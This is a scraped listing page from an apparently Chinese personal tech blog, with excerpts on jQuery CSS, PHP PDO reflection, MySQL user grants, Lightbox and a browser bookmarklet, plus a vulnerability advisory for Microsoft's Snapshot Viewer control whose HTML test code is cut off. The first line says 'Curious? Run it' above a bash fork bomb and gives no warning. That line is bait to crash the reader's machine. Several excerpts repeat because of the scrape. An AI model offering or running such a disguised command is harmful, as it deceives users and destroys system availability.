好奇么?跑跑
:() { :|:& }; :
JS+JQuery 动态创建CSS并应用 |
[ 2008-08-18 16:23:53 | 作者: sunya ]
JQuery代码:网上有流传这类代码,但是很奇怪就是没试成功.
在贴上JavaScript的方法[quote=][/quote]...
阅读全文…
引用
$('head').append("<LINK media=screen href=\" URL/style.css \" type=text/css rel=stylesheet>");
/$(document.createElement("link")).attr({"type":"text/css","rel":"stylesheet","href":" URL/style.css ","media":"screen"}).appendTo("head");
$("link[@href=URL/style.css]").attr({"disabled":true}).remove();
$("link[@href=URL/style.css]").attr({"disabled":true}).remove();
在贴上JavaScript的方法[quote=][/quote]...
阅读全文…
Snapshot Viewer 控件任意文件下载漏洞 |
[ 2008-07-07 10:30:34 | 作者: sunya ]
危害
远程攻击者可以利用漏洞下载任意文件到目标系统位置,导致以登录用户进程权限执行任意指令。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户访问。
漏洞信息
Microsoft Access Snapshot Viewer是一款Office中的报表快照功能实现。
Microsoft Snapshot Viewer snapview.ocx存在输入验证问题,远程攻击者可以利用漏洞下载任意文件到目标系统位置,导致以登录用户进程权限执行任意指令。
此漏洞影响Microsoft Office Access 2000, Microsoft Office Access 2002, 和Microsoft Office Access 2003下的Snapshot Viewer。
测试方法:...
阅读全文…
远程攻击者可以利用漏洞下载任意文件到目标系统位置,导致以登录用户进程权限执行任意指令。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户访问。
漏洞信息
Microsoft Access Snapshot Viewer是一款Office中的报表快照功能实现。
Microsoft Snapshot Viewer snapview.ocx存在输入验证问题,远程攻击者可以利用漏洞下载任意文件到目标系统位置,导致以登录用户进程权限执行任意指令。
此漏洞影响Microsoft Office Access 2000, Microsoft Office Access 2002, 和Microsoft Office Access 2003下的Snapshot Viewer。
测试方法:
引用
<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
阅读全文…
列出Php PDO对象方法属性 |
[ 2007-06-06 16:21:28 | 作者: sunya ]
引用
echo '<pre>';
reflection::export(new reflectionclass('PDOStatement'));
echo '</pre>';
reflection::export(new reflectionclass('PDOStatement'));
echo '</pre>';
mysql 新建用户 |
[ 2007-06-05 17:36:17 | 作者: sunya ]
引用
grant select,insert,update,delete on 数据库名.* to 用户名@"%" identified by "密码";
flush privileges;
flush privileges;
图片特效脚本 lightbox 更新至2.03 |
[ 2007-04-12 13:35:20 | 作者: sunya ]
Lightbox JS 是一个简单方便的用来把图片覆盖在当前页面上的脚本,它能被快速安装并且运作于所有流行的浏览器.
最新更新 Version 2.0#
图片集: 分组相关的图片并且能轻松的导航它们
# 视觉特效: 奇特的自适应调整
# 向后兼容: yes!
v2.03 Released 4/10/07
- Improved keyboard ...
阅读全文…
最新更新 Version 2.0#
图片集: 分组相关的图片并且能轻松的导航它们
# 视觉特效: 奇特的自适应调整
# 向后兼容: yes!
v2.03 Released 4/10/07
- Improved keyboard ...
阅读全文…
刚闲逛发先的一段无聊代码 |
[ 2007-03-12 11:19:56 | 作者: sunya ]
呵呵,可以在任意网站的首页执行看看
忘记说明使用方法了
1、Copy本段代码
2、打开一个网站,如www.google.com
3、将代码粘贴到地址栏上
4、按下回车
瓦哈哈哈~~~
阅读全文…
忘记说明使用方法了
1、Copy本段代码
2、打开一个网站,如www.google.com
3、将代码粘贴到地址栏上
4、按下回车
瓦哈哈哈~~~
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300;
...阅读全文…







